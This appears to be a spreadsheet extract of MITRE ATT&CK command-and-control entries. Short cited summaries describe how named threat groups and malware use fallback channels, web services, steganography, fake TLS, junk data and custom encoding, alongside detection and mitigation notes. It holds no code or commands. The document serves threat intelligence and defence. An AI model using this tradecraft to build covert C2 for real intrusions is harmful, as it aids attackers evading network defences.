[S-Type](https://attack.mitre.org/software/S0085) primarily uses port 80 for C2, but falls back to ports 443 or 8080 if initial communication fails.(Citation: Cylance Dust Storm)
Shark
[Shark](https://attack.mitre.org/software/S1019) can update its configuration to use a different C2 server.(Citation: ClearSky Siamesekitten August 2021)
ShimRat
[ShimRat](https://attack.mitre.org/software/S0444) has used a secondary C2 location if the first was unavailable.(Citation: FOX-IT May 2016 Mofang)	
SideTwist
[SideTwist](https://attack.mitre.org/software/S0610) has primarily used port 443 for C2 but can use port 80 as a fallback.(Citation: Check Point APT34 April 2021)
SslMM
[SslMM](https://attack.mitre.org/software/S0058) has a hard-coded primary and backup C2 string.(Citation: Baumgartner Naikon 2015)
Stuxnet
[Stuxnet](https://attack.mitre.org/software/S0603) has the ability to generate new C2 domains.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)
TAINTEDSCRIBE
[TAINTEDSCRIBE](https://attack.mitre.org/software/S0586) can randomly pick one of five hard-coded IP addresses for C2 communication; if one of the IP fails, it will wait 60 seconds and then try another IP address.(Citation: CISA MAR-10288834-2.v1  TAINTEDSCRIBE MAY 2020)
TinyTurla
[TinyTurla](https://attack.mitre.org/software/S0668) can go through a list of C2 server IPs and will try to register with each until one responds.(Citation: Talos TinyTurla September 2021)
TrickBot
[TrickBot](https://attack.mitre.org/software/S0266) can use secondary C2 servers for communication after establishing connectivity and relaying victim information to primary C2 servers.(Citation: Cyberreason Anchor December 2019)
Uroburos
[Uroburos](https://attack.mitre.org/software/S0022) can use up to 10 channels to communicate between implants.(Citation: Joint Cybersecurity Advisory AA23-129A Snake Malware May 2023)
Valak
[Valak](https://attack.mitre.org/software/S0476) can communicate over multiple C2 hosts.(Citation: Unit 42 Valak July 2020)
WinMM
[WinMM](https://attack.mitre.org/software/S0059) is usually configured with primary and backup domains for C2 communications.(Citation: Baumgartner Naikon 2015)
XTunnel
The C2 server used by [XTunnel](https://attack.mitre.org/software/S0117) provides a port number to the victim to use as a fallback in case the connection closes on the currently used port.(Citation: ESET Sednit Part 2)
</t>
  </si>
  <si>
    <t xml:space="preserve">Network Connection Creation
Monitor for newly constructed network connections that are sent or received by untrusted hosts.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Network Intrusion Prevention
Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level.
Restrict Web-Based Content
Web proxies can be used to enforce external network communication policy that prevents use of unauthorized external services.
Operation Ghost
For [Operation Ghost](https://attack.mitre.org/campaigns/C0023), [APT29](https://attack.mitre.org/groups/G0016) used social media platforms to hide communications to C2 servers.(Citation: ESET Dukes October 2019)
APT12
[APT12](https://attack.mitre.org/groups/G0005) has used blogs and WordPress for C2 infrastructure.(Citation: Meyers Numbered Panda)
APT28
[APT28](https://attack.mitre.org/groups/G0007) has used Google Drive for C2.(Citation: TrendMicro Pawn Storm Dec 2020)
APT37
[APT37](https://attack.mitre.org/groups/G0067) leverages social networking sites and cloud platforms (AOL, Twitter, Yandex, Mediafire, pCloud, Dropbox, and Box) for C2.(Citation: FireEye APT37 Feb 2018)(Citation: Talos Group123)
APT39
[APT39](https://attack.mitre.org/groups/G0087) has communicated with C2 through files uploaded to and downloaded from DropBox.(Citation: BitDefender Chafer May 2020)
Carbanak
[Carbanak](https://attack.mitre.org/groups/G0008) has used a VBScript named "ggldr" that uses Google Apps Script, Sheets, and Forms services for C2.(Citation: Forcepoint Carbanak Google C2)
FIN7
[FIN7](https://attack.mitre.org/groups/G0046) used legitimate services like Google Docs, Google Scripts, and Pastebin for C2.(Citation: FireEye FIN7 Aug 2018)
HEXANE
[HEXANE](https://attack.mitre.org/groups/G1001) has used cloud services, including OneDrive, for C2.(Citation: Microsoft POLONIUM June 2022)
Kimsuky
[Kimsuky](https://attack.mitre.org/groups/G0094) has used Blogspot pages for C2.(Citation: Talos Kimsuky Nov 2021)
Lazarus Group
[Lazarus Group](https://attack.mitre.org/groups/G0032) has used GitHub as C2, pulling hosted image payloads then committing command execution output to files in specific directories.(Citation: Lazarus APT January 2022)
Magic Hound
[Magic Hound](https://attack.mitre.org/groups/G0059) malware can use a SOAP Web service to communicate with its C2 server.(Citation: Unit 42 Magic Hound Feb 2017)
MuddyWater
[MuddyWater](https://attack.mitre.org/groups/G0069) has used web services including OneHub to distribute remote access tools.(Citation: Anomali Static Kitten February 2021)
POLONIUM
[POLONIUM](https://attack.mitre.org/groups/G1005) has used OneDrive and DropBox for C2.(Citation: Microsoft POLONIUM June 2022)
Sandworm Team
[Sandworm Team](https://attack.mitre.org/groups/G0034) has used the Telegram Bot API from Telegram Messenger to send and receive commands to its Python backdoor. [Sandworm Team](https://attack.mitre.org/groups/G0034) also used legitimate M.E.Doc software update check requests for sending and receiving commands and hosted malicious payloads on putdrive.com.(Citation: ESET Telebots Dec 2016)(Citation: ESET Telebots June 2017)
Turla
A [Turla](https://attack.mitre.org/groups/G0010) JavaScript backdoor has used Google Apps Script as its C2 server.(Citation: ESET Turla Mosquito Jan 2018)(Citation: ESET Turla Mosquito May 2018)
ZIRCONIUM
[ZIRCONIUM](https://attack.mitre.org/groups/G0128) has used Dropbox for C2 allowing upload and download of files as well as execution of arbitrary commands.(Citation: Google Election Threats October 2020)(Citation: Zscaler APT31 Covid-19 October 2020)
BADNEWS
[BADNEWS](https://attack.mitre.org/software/S0128) can use multiple C2 channels, including RSS feeds, Github, forums, and blogs.(Citation: Forcepoint Monsoon)(Citation: PaloAlto Patchwork Mar 2018)(Citation: TrendMicro Patchwork Dec 2017)
BLACKCOFFEE
[BLACKCOFFEE](https://attack.mitre.org/software/S0069) has also obfuscated its C2 traffic as normal traffic to sites such as Github.(Citation: FireEye APT17)(Citation: FireEye Periscope March 2018)
BLUELIGHT
[BLUELIGHT](https://attack.mitre.org/software/S0657) can use different cloud providers for its C2.(Citation: Volexity InkySquid BLUELIGHT August 2021)
BoxCaon
[BoxCaon](https://attack.mitre.org/software/S0651) has used DropBox for C2 communications.(Citation: Checkpoint IndigoZebra July 2021) 
CALENDAR
The [CALENDAR](https://attack.mitre.org/software/S0025) malware communicates through the use of events in Google Calendar.(Citation: Mandiant APT1)(Citation: Mandiant APT1 Appendix)
Clambling
[Clambling](https://attack.mitre.org/software/S0660) can use Dropbox to download malicious payloads, send commands, and receive information.(Citation: Trend Micro DRBControl February 2020)(Citation: Talent-Jump Clambling February 2020)
CloudDuke
One variant of [CloudDuke](https://attack.mitre.org/software/S0054) uses a Microsoft OneDrive account to exchange commands and stolen data with its operators.(Citation: F-Secure The Dukes)
ComRAT
[ComRAT](https://attack.mitre.org/software/S0126) has the ability to use the Gmail web UI to receive commands and exfiltrate information.(Citation: ESET ComRAT May 2020)(Citation: CISA ComRAT Oct 2020)
Comnie
[Comnie](https://attack.mitre.org/software/S0244) uses blogs and third-party sites (GitHub, tumbler, and BlogSpot) to avoid DNS-based blocking of their communication to the command and control server.(Citation: Palo Alto Comnie)
CozyCar
[CozyCar](https://attack.mitre.org/software/S0046) uses Twitter as a backup C2 channel to Twitter accounts specified in its configuration file.(Citation: F-Secure CozyDuke)
CreepyDrive
[CreepyDrive](https://attack.mitre.org/software/S1023) can use OneDrive for C2.(Citation: Microsoft POLONIUM June 2022)
Crutch
[Crutch](https://attack.mitre.org/software/S0538) can use Dropbox to receive commands and upload stolen data.(Citation: ESET Crutch December 2020)
DOGCALL
[DOGCALL](https://attack.mitre.org/software/S0213) is capable of leveraging cloud storage APIs such as Cloud, Box, Dropbox, and Yandex for C2.(Citation: FireEye APT37 Feb 2018)(Citation: Unit 42 Nokki Oct 2018)
Empire
[Empire](https://attack.mitre.org/software/S0363) can use Dropbox and GitHub for C2.(Citation: Github PowerShell Empire)
GLOOXMAIL
[GLOOXMAIL](https://attack.mitre.org/software/S0026) communicates to servers operated by Google using the Jabber/XMPP protocol.(Citation: Mandiant APT1)(Citation: CyberESI GTALK)
Grandoreiro
[Grandoreiro](https://attack.mitre.org/software/S0531) can utilize web services including Google sites to send and receive C2 data.(Citation: IBM Grandoreiro April 2020)(Citation: ESET Grandoreiro April 2020)
KARAE
[KARAE](https://attack.mitre.org/software/S0215) can use public cloud-based storage providers for command and control.(Citation: FireEye APT37 Feb 2018)
Kazuar
[Kazuar](https://attack.mitre.org/software/S0265) has used compromised WordPress blogs as C2 servers.(Citation: Unit 42 Kazuar May 2017)
LOWBALL
[LOWBALL](https://attack.mitre.org/software/S0042) uses the Dropbox cloud storage service for command and control.(Citation: FireEye admin@338)
Orz
[Orz](https://attack.mitre.org/software/S0229) has used Technet and Pastebin web pages for command and control.(Citation: Proofpoint Leviathan Oct 2017)
POORAIM
[POORAIM](https://attack.mitre.org/software/S0216) has used AOL Instant Messenger for C2.(Citation: FireEye APT37 Feb 2018)
PowerStallion
[PowerStallion](https://attack.mitre.org/software/S0393) uses Microsoft OneDrive as a C2 server via a network drive mapped with &lt;code&gt;net use&lt;/code&gt;.(Citation: ESET Turla PowerShell May 2019)
ROKRAT
[ROKRAT](https://attack.mitre.org/software/S0240) has used legitimate social networking sites and cloud platforms (including but not limited to Twitter, Yandex, Dropbox, and Mediafire) for C2 communications.(Citation: Talos ROKRAT)(Citation: Securelist ScarCruft May 2019)(Citation: Volexity InkySquid RokRAT August 2021)
RegDuke
[RegDuke](https://attack.mitre.org/software/S0511) can use Dropbox as its C2 server.(Citation: ESET Dukes October 2019)
Revenge RAT
[Revenge RAT](https://attack.mitre.org/software/S0379) used blogpost.com as its primary command and control server during a campaign.(Citation: Cofense RevengeRAT Feb 2019)
RogueRobin
[RogueRobin](https://attack.mitre.org/software/S0270) has used Google Drive as a Command and Control channel. (Citation: Unit42 DarkHydrus Jan 2019)
SLOWDRIFT
[SLOWDRIFT](https://attack.mitre.org/software/S0218) uses cloud based services for C2.(Citation: FireEye APT37 Feb 2018)
Small Sieve
[Small Sieve](https://attack.mitre.org/software/S1035) has the ability to use the Telegram Bot API from Telegram Messenger to send and receive messages.(Citation: NCSC GCHQ Small Sieve Jan 2022)
UBoatRAT
[UBoatRAT](https://attack.mitre.org/software/S0333) has used GitHub and a public blog service in Hong Kong for C2 communications.(Citation: PaloAlto UBoatRAT Nov 2017)
yty
[yty](https://attack.mitre.org/software/S0248) communicates to the C2 server by retrieving a Google Doc.(Citation: ASERT Donot March 2018)
</t>
  </si>
  <si>
    <t xml:space="preserve">Network Traffic Content
Monitor and analyze traffic patterns and packet inspection associated to protocol(s), leveraging SSL/TLS inspection for encrypted traffic, that do not follow the expected protocol standards and traffic flows (e.g extraneous packets that do not belong to established flows, gratuitous or anomalous traffic patterns, anomalous syntax, or structure).
Network Intrusion Prevention
Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate some obfuscation activity at the network level. 
Operation Ghost
During [Operation Ghost](https://attack.mitre.org/campaigns/C0023), [APT29](https://attack.mitre.org/groups/G0016) used steganography to hide the communications between the implants and their C&amp;C servers.(Citation: ESET Dukes October 2019)
Axiom
[Axiom](https://attack.mitre.org/groups/G0001) has used steganography to hide its C2 communications.(Citation: Novetta-Axiom)
Daserf
[Daserf](https://attack.mitre.org/software/S0187) can use steganography to hide malicious code downloaded to the victim.(Citation: Trend Micro Daserf Nov 2017)
Duqu
When the [Duqu](https://attack.mitre.org/software/S0038) command and control is operating over HTTP or HTTPS, Duqu uploads data to its controller by appending it to a blank JPG file.(Citation: Symantec W32.Duqu)
HAMMERTOSS
[HAMMERTOSS](https://attack.mitre.org/software/S0037) is controlled via commands that are appended to image files.(Citation: FireEye APT29)
LightNeuron
[LightNeuron](https://attack.mitre.org/software/S0395) is controlled via commands that are embedded into PDFs and JPGs using steganographic methods.(Citation: ESET LightNeuron May 2019)
RDAT
[RDAT](https://attack.mitre.org/software/S0495) can process steganographic images attached to email messages to send and receive C2 commands. [RDAT](https://attack.mitre.org/software/S0495) can also embed additional messages within BMP images to communicate with the [RDAT](https://attack.mitre.org/software/S0495) operator.(Citation: Unit42 RDAT July 2020)	
SUNBURST
[SUNBURST](https://attack.mitre.org/software/S0559) C2 data attempted to appear as benign XML related to .NET assemblies or as a faux JSON blob.(Citation: FireEye SUNBURST Backdoor December 2020)(Citation: FireEye SUNBURST Additional Details Dec 2020)(Citation: Symantec Sunburst Sending Data January 2021)
Sliver
[Sliver](https://attack.mitre.org/software/S0633) can encode binary data into a .PNG file for C2 communication.(Citation: GitHub Sliver HTTP)
ZeroT
[ZeroT](https://attack.mitre.org/software/S0230) has retrieved stage 2 payloads as Bitmap images that use Least Significant Bit (LSB) steganography.(Citation: Proofpoint TA459 April 2017)(Citation: Proofpoint ZeroT Feb 2017)
Zox
[Zox](https://attack.mitre.org/software/S0672) has used the .PNG file format for C2 communications.(Citation: Novetta-Axiom)
</t>
  </si>
  <si>
    <t xml:space="preserve">Network Traffic Content
Monitor and analyze traffic patterns and packet inspection associated to protocol(s), leveraging SSL/TLS inspection for encrypted traffic,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Intrusion Prevention
Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate some obfuscation activity at the network level.
C0017
During [C0017](https://attack.mitre.org/campaigns/C0017), [APT41](https://attack.mitre.org/groups/G0096) frequently configured the URL endpoints of their stealthy passive backdoor LOWKEY.PASSIVE to masquerade as normal web application traffic on an infected server.(Citation: Mandiant APT41)
Higaisa
[Higaisa](https://attack.mitre.org/groups/G0126) used a FakeTLS session for C2 communications.(Citation: Zscaler Higaisa 2020)
Lazarus Group
[Lazarus Group](https://attack.mitre.org/groups/G0032) malware also uses a unique form of communication encryption known as FakeTLS that mimics TLS but uses a different encryption method, potentially evading SSL traffic inspection/decryption.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Destructive Malware)(Citation: McAfee Lazarus Resurfaces Feb 2018)(Citation: McAfee GhostSecret)
BADCALL
[BADCALL](https://attack.mitre.org/software/S0245) uses a FakeTLS method during C2.(Citation: US-CERT BADCALL)
Bankshot
[Bankshot](https://attack.mitre.org/software/S0239) generates a false TLS handshake using a public certificate to disguise C2 network communications.(Citation: US-CERT Bankshot Dec 2017)
Cobalt Strike
[Cobalt Strike](https://attack.mitre.org/software/S0154) can mimic the HTTP protocol for C2 communication, while hiding the actual data in either an HTTP header, URI parameter, the transaction body, or appending it to the URI.(Citation: Cobalt Strike Manual 4.3 November 2020)
FALLCHILL
[FALLCHILL](https://attack.mitre.org/software/S0181) uses fake Transport Layer Security (TLS) to communicate with its C2 server.(Citation: US-CERT FALLCHILL Nov 2017)
FakeM
[FakeM](https://attack.mitre.org/software/S0076) C2 traffic attempts to evade detection by resembling data generated by legitimate messenger applications, such as MSN and Yahoo! messengers. Additionally, some variants of [FakeM](https://attack.mitre.org/software/S0076) use modified SSL code for communications back to C2 servers, making SSL decryption ineffective.(Citation: Scarlet Mimic Jan 2016)
HARDRAIN
[HARDRAIN](https://attack.mitre.org/software/S0246) uses FakeTLS to communicate with its C2 server.(Citation: US-CERT HARDRAIN March 2018)
InvisiMole
[InvisiMole](https://attack.mitre.org/software/S0260) can mimic HTTP protocol with custom HTTP “verbs” HIDE, ZVVP, and NOP.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)
KeyBoy
[KeyBoy](https://attack.mitre.org/software/S0387) uses custom SSL libraries to impersonate SSL in C2 traffic.(Citation: PWC KeyBoys Feb 2017)
Okrum
[Okrum](https://attack.mitre.org/software/S0439) mimics HTTP protocol for C2 communication, while hiding the actual messages in the Cookie and Set-Cookie headers of the HTTP requests.(Citation: ESET Okrum July 2019)
SUNBURST
[SUNBURST](https://attack.mitre.org/software/S0559) masqueraded its network traffic as the Orion Improvement Program (OIP) protocol.(Citation: FireEye SUNBURST Backdoor December 2020)
TAINTEDSCRIBE
[TAINTEDSCRIBE](https://attack.mitre.org/software/S0586) has used FakeTLS for session authentication.(Citation: CISA MAR-10288834-2.v1  TAINTEDSCRIBE MAY 2020)
Uroburos
[Uroburos](https://attack.mitre.org/software/S0022) can use custom communication methodologies that ride over common  protocols including TCP, UDP, HTTP, SMTP, and DNS in order to blend with normal network traffic. (Citation: Joint Cybersecurity Advisory AA23-129A Snake Malware May 2023)
</t>
  </si>
  <si>
    <t xml:space="preserve">Network Traffic Content
Monitor and analyze traffic patterns and packet inspection associated to protocol(s), leveraging SSL/TLS inspection for encrypted traffic,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Intrusion Prevention
Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate some obfuscation activity at the network level. 
APT28
[APT28](https://attack.mitre.org/groups/G0007) added "junk data" to each encoded string, preventing trivial decoding without knowledge of the junk removal algorithm. Each implant was given a "junk length" value when created, tracked by the controller software to allow seamless communication but prevent analysis of the command protocol on the wire.(Citation: FireEye APT28)
BendyBear
[BendyBear](https://attack.mitre.org/software/S0574) has used byte randomization to obscure its behavior.(Citation: Unit42 BendyBear Feb 2021)
Downdelph
[Downdelph](https://attack.mitre.org/software/S0134) inserts pseudo-random characters between each original character during encoding of C2 network requests, making it difficult to write signatures on them.(Citation: ESET Sednit Part 3)
GoldMax
[GoldMax](https://attack.mitre.org/software/S0588) has used decoy traffic to surround its malicious network traffic to avoid detection.(Citation: MSTIC NOBELIUM Mar 2021)
GrimAgent
[GrimAgent](https://attack.mitre.org/software/S0632)  can pad C2 messages with random generated values.(Citation: Group IB GrimAgent July 2021)
Kevin
[Kevin](https://attack.mitre.org/software/S1020) can generate a sequence of dummy HTTP C2 requests to obscure traffic.(Citation: Kaspersky Lyceum October 2021)
Mori
[Mori](https://attack.mitre.org/software/S1047) has obfuscated the FML.dll with 200MB of junk data.(Citation: DHS CISA AA22-055A MuddyWater February 2022)
P2P ZeuS
[P2P ZeuS](https://attack.mitre.org/software/S0016) added junk data to outgoing UDP packets to peer implants.(Citation: Dell P2P ZeuS)
P8RAT
[P8RAT](https://attack.mitre.org/software/S0626) can send randomly-generated data as part of its C2 communication.(Citation: Securelist APT10 March 2021)
PLEAD
[PLEAD](https://attack.mitre.org/software/S0435) samples were found to be highly obfuscated with junk code.(Citation: ESET PLEAD Malware July 2018)(Citation: TrendMicro BlackTech June 2017)
SUNBURST
[SUNBURST](https://attack.mitre.org/software/S0559) added junk bytes to its C2 over HTTP.(Citation: FireEye SUNBURST Backdoor December 2020)
TrailBlazer
[TrailBlazer](https://attack.mitre.org/software/S0682) has used random identifier strings to obscure its C2 operations and result codes.(Citation: CrowdStrike StellarParticle January 2022)
Turian
[Turian](https://attack.mitre.org/software/S0647) can insert pseudo-random characters into its network encryption setup.(Citation: ESET BackdoorDiplomacy Jun 2021)
Uroburos
[Uroburos](https://attack.mitre.org/software/S0022) can add extra characters in encoded strings to help mimic DNS legitimate requests.(Citation: Joint Cybersecurity Advisory AA23-129A Snake Malware May 2023)
WellMess
[WellMess](https://attack.mitre.org/software/S0514) can use junk data in the Base64 string for additional obfuscation.(Citation: CISA WellMess July 2020)
</t>
  </si>
  <si>
    <t xml:space="preserve">Network Traffic Content
Monitor and analyze traffic patterns and packet inspection associated to protocol(s), leveraging SSL/TLS inspection for encrypted traffic,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Intrusion Prevention
Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate some obfuscation activity at the network level.
Operation Wocao
During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors encrypted IP addresses used for "Agent" proxy hops with RC4.(Citation: FoxIT Wocao December 2019)
FlawedAmmyy
[FlawedAmmyy](https://attack.mitre.org/software/S0381) may obfuscate portions of the initial C2 handshake.(Citation: Proofpoint TA505 Mar 2018)
FunnyDream
[FunnyDream](https://attack.mitre.org/software/S1044) can send compressed and obfuscated packets to C2.(Citation: Bitdefender FunnyDream Campaign November 2020)
RDAT
[RDAT](https://attack.mitre.org/software/S0495) has used encoded data within subdomains as AES ciphertext to communicate from the host to the C2.(Citation: Unit42 RDAT July 2020)
SLOTHFULMEDIA
[SLOTHFULMEDIA](https://attack.mitre.org/software/S0533) has hashed a string containing system information prior to exfiltration via POST requests.(Citation: CISA MAR SLOTHFULMEDIA October 2020)
SideTwist
[SideTwist](https://attack.mitre.org/software/S0610) can embed C2 responses in the source code of a fake Flickr webpage.(Citation: Check Point APT34 April 2021)
TrailBlazer
[TrailBlazer](https://attack.mitre.org/software/S0682) can masquerade its C2 traffic as legitimate Google Notifications HTTP requests.(Citation: CrowdStrike StellarParticle January 2022)
</t>
  </si>
  <si>
    <t xml:space="preserve">Network Traffic Content
Monitor for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Network Intrusion Prevention
Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary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
BACKSPACE
Newer variants of [BACKSPACE](https://attack.mitre.org/software/S0031) will encode C2 communications with a custom system.(Citation: FireEye APT30)
Bankshot
[Bankshot](https://attack.mitre.org/software/S0239) encodes commands from the control server using a range of characters and gzip.(Citation: McAfee Bankshot)
Cyclops Blink
[Cyclops Blink](https://attack.mitre.org/software/S0687) can use a custom binary scheme to encode messages with specific commands and parameters to be executed.(Citation: NCSC Cyclops Blink February 2022)
InvisiMole
[InvisiMole](https://attack.mitre.org/software/S0260) can use a modified base32 encoding to encode data within the subdomain of C2 requests.(Citation: ESET InvisiMole June 2020)
NightClub
[NightClub](https://attack.mitre.org/software/S1090) has used a non-standard encoding in DNS tunneling removing any `=` from the result of base64 encoding, and replacing `/` characters with `-s` and `+` characters with `-p`.(Citation: MoustachedBouncer ESET August 2023)
OceanSalt
[OceanSalt](https://attack.mitre.org/software/S0346) can encode data with a NOT operation before sending the data to the control server.(Citation: McAfee Oceansalt Oct 2018)
PowGoop
[PowGoop](https://attack.mitre.org/software/S1046) can use a modified Base64 encoding mechanism to send data to and from the C2 server.(Citation: CYBERCOM Iranian Intel Cyber January 2022)
RDAT
[RDAT](https://attack.mitre.org/software/S0495) can communicate with the C2 via subdomains that utilize base64 with character substitutions.(Citation: Unit42 RDAT July 2020)	
ShadowPad
[ShadowPad](https://attack.mitre.org/software/S0596) has encoded data as readable Latin characters.(Citation: Securelist ShadowPad Aug 2017)
Small Sieve
[Small Sieve](https://attack.mitre.org/software/S1035) can use a custom hex byte swapping encoding scheme to obfuscate tasking traffic.(Citation: DHS CISA AA22-055A MuddyWater February 2022)(Citation: NCSC GCHQ Small Sieve Jan 2022)
Uroburos
[Uroburos](https://attack.mitre.org/software/S0022) can use a custom base62 and a de-facto base32 encoding that uses digits 0-9 and lowercase letters a-z in C2 communications.(Citation: Joint Cybersecurity Advisory AA23-129A Snake Malware May 2023)
</t>
  </si>
  <si>
    <t xml:space="preserve">Network Connection Creation
Monitor for newly constructed network connections that are sent or received by untrusted hosts.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Network Intrusion Prevention
Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level.
Restrict Web-Based Content
Web proxies can be used to enforce external network communication policy that prevents use of unauthorized external services.
C0017
During [C0017](https://attack.mitre.org/campaigns/C0017), [APT41](https://attack.mitre.org/groups/G0096) used the Cloudflare services for C2 communications.(Citation: Mandiant APT41)
C0027
During [C0027](https://attack.mitre.org/campaigns/C0027), [Scattered Spider](https://attack.mitre.org/groups/G1015) downloaded tools from sites including file.io, GitHub, and paste.ee.(Citation: Crowdstrike TELCO BPO Campaign December 2022)
Operation Spalax
During [Operation Spalax](https://attack.mitre.org/campaigns/C0005), the threat actors used OneDrive and MediaFire to host payloads.(Citation: ESET Operation Spalax Jan 2021)
APT32
[APT32](https://attack.mitre.org/groups/G0050) has used Dropbox, Amazon S3, and Google Drive to host malicious downloads.(Citation: Volexity Ocean Lotus November 2020)
EXOTIC LILY
[EXOTIC LILY](https://attack.mitre.org/groups/G1011) has used file-sharing services including WeTransfer, TransferNow, and OneDrive to deliver payloads.(Citation: Google EXOTIC LILY March 2022)
Ember Bear
[Ember Bear](https://attack.mitre.org/groups/G1003) has used Discord's content delivery network (CDN) to deliver malware and malicious scripts to a compromised host.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )
FIN6
[FIN6](https://attack.mitre.org/groups/G0037) has used Pastebin and Google Storage to host content for their operations.(Citation: FireEye FIN6 Apr 2019)	
FIN8
[FIN8](https://attack.mitre.org/groups/G0061) has used &lt;code&gt;sslip.io&lt;/code&gt;, a free IP to domain mapping service that also makes SSL certificate generation easier for traffic encryption, as part of their command and control.(Citation: Bitdefender FIN8 July 2021)
Fox Kitten
[Fox Kitten](https://attack.mitre.org/groups/G0117) has used Amazon Web Services to host C2.(Citation: ClearSky Pay2Kitten December 2020)
Gamaredon Group
[Gamaredon Group](https://attack.mitre.org/groups/G0047) has used GitHub repositories for downloaders which will be obtained by the group's .NET executable on the compromised system.(Citation: ESET Gamaredon June 2020)	
Inception
[Inception](https://attack.mitre.org/groups/G0100) has incorporated at least five different cloud service providers into their C2 infrastructure including CloudMe.(Citation: Kaspersky Cloud Atlas December 2014)(Citation: Symantec Inception Framework March 2018)
LazyScripter
[LazyScripter](https://attack.mitre.org/groups/G0140) has used GitHub to host its payloads to operate spam campaigns.(Citation: MalwareBytes LazyScripter Feb 2021) 
Mustang Panda
[Mustang Panda](https://attack.mitre.org/groups/G0129) has used DropBox URLs to deliver variants of [PlugX](https://attack.mitre.org/software/S0013).(Citation: Proofpoint TA416 Europe March 2022)
Rocke
[Rocke](https://attack.mitre.org/groups/G0106) has used Pastebin, Gitee, and GitLab for Command and Control.(Citation: Anomali Rocke March 2019)(Citation: Talos Rocke August 2018)
TeamTNT
[TeamTNT](https://attack.mitre.org/groups/G0139) has leveraged iplogger.org to send collected data back to C2.(Citation: Aqua TeamTNT August 2020)(Citation: Cisco Talos Intelligence Group)
Turla
[Turla](https://attack.mitre.org/groups/G0010) has used legitimate web services including Pastebin, Dropbox, and GitHub for C2 communications.(Citation: Accenture HyperStack October 2020)(Citation: ESET Crutch December 2020)
BADHATCH
[BADHATCH](https://attack.mitre.org/software/S1081) can be utilized to abuse `sslip.io`, a free IP to domain mapping service, as part of actor-controlled C2 channels.(Citation: BitDefender BADHATCH Mar 2021)
Bazar
[Bazar](https://attack.mitre.org/software/S0534) downloads have been hosted on Google Docs.(Citation: Cybereason Bazar July 2020)(Citation: Zscaler Bazar September 2020)
BoomBox
[BoomBox](https://attack.mitre.org/software/S0635) can download files from Dropbox using a hardcoded access token.(Citation: MSTIC Nobelium Toolset May 2021)
Brute Ratel C4
[Brute Ratel C4](https://attack.mitre.org/software/S1063) can use legitimate websites for external C2 channels including Slack, Discord, and MS Teams.(Citation: Palo Alto Brute Ratel July 2022)
Bumblebee
[Bumblebee](https://attack.mitre.org/software/S1039) has been downloaded to victim's machines from OneDrive.(Citation: Proofpoint Bumblebee April 2022)
Carbon
[Carbon](https://attack.mitre.org/software/S0335) can use Pastebin to receive C2 commands.(Citation: Accenture HyperStack October 2020)
CharmPower
[CharmPower](https://attack.mitre.org/software/S0674) can download additional modules from actor-controlled Amazon S3 buckets.(Citation: Check Point APT35 CharmPower January 2022)
DarkTortilla
[DarkTortilla](https://attack.mitre.org/software/S1066) can retrieve its primary payload from public sites such as Pastebin and Textbin.(Citation: Secureworks DarkTortilla Aug 2022)
Doki
[Doki](https://attack.mitre.org/software/S0600) has used the dogechain.info API to generate a C2 address.(Citation: Intezer Doki July 20)
DropBook
[DropBook](https://attack.mitre.org/software/S0547) can communicate with its operators by exploiting the Simplenote, DropBox, and the social media platform, Facebook, where it can create fake accounts to control the backdoor and receive instructions.(Citation: Cybereason Molerats Dec 2020)(Citation: BleepingComputer Molerats Dec 2020)
GuLoader
[GuLoader](https://attack.mitre.org/software/S0561) has the ability to download malware from Google Drive.(Citation: Medium Eli Salem GuLoader April 2021)
Hildegard
[Hildegard](https://attack.mitre.org/software/S0601) has downloaded scripts from GitHub.(Citation: Unit 42 Hildegard Malware)
NETWIRE
[NETWIRE](https://attack.mitre.org/software/S0198) has used web services including Paste.ee to host payloads.(Citation: FireEye NETWIRE March 2019)
SMOKEDHAM
[SMOKEDHAM](https://attack.mitre.org/software/S0649) has used Google Drive and Dropbox to host files downloaded by victims via malicious links.(Citation: FireEye Shining A Light on DARKSIDE May 2021)
SharpStage
[SharpStage](https://attack.mitre.org/software/S0546) has used a legitimate web service for evading detection.(Citation: Cybereason Molerats Dec 2020) 
Sibot
[Sibot](https://attack.mitre.org/software/S0589) has used a legitimate compromised website to download DLLs to the victim's machine.(Citation: MSTIC NOBELIUM Mar 2021)
Snip3
[Snip3](https://attack.mitre.org/software/S1086) can download additional payloads from web services including Pastebin and top4top.(Citation: Morphisec Snip3 May 2021)
WhisperGate
[WhisperGate](https://attack.mitre.org/software/S0689) can download additional payloads hosted on a Discord channel.(Citation: Crowdstrike WhisperGate January 2022)(Citation: Unit 42 WhisperGate January 2022)(Citation: Microsoft WhisperGate January 2022)(Citation: Cisco Ukraine Wipers January 2022)(Citation: Medium S2W WhisperGate January 2022)
ngrok
[ngrok](https://attack.mitre.org/software/S0508) has been used by threat actors to proxy C2 connections to ngrok service subdomains.(Citation: Zdnet Ngrok September 2018)
</t>
  </si>
  <si>
    <t xml:space="preserve">Network Traffic Content
Monitor for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Note: Network Analysis frameworks such as Zeek can be used to capture, decode, and alert on network protocols and packet contents. 
Network Intrusion Prevention
Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary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 (Citation: University of Birmingham C2)
BADNEWS
After encrypting C2 data, [BADNEWS](https://attack.mitre.org/software/S0128) converts it into a hexadecimal representation and then encodes it into base64.(Citation: Forcepoint Monsoon)
H1N1
[H1N1](https://attack.mitre.org/software/S0132) obfuscates C2 traffic with an altered version of base64.(Citation: Cisco H1N1 Part 2)
Linux Rabbit
[Linux Rabbit](https://attack.mitre.org/software/S0362) sends the payload from the C2 server as an encoded URL parameter. (Citation: Anomali Linux Rabbit 2018)
Mythic
[Mythic](https://attack.mitre.org/software/S0699) provides various transform functions to encode and/or randomize C2 data.(Citation: Mythc Documentation)	
Ursnif
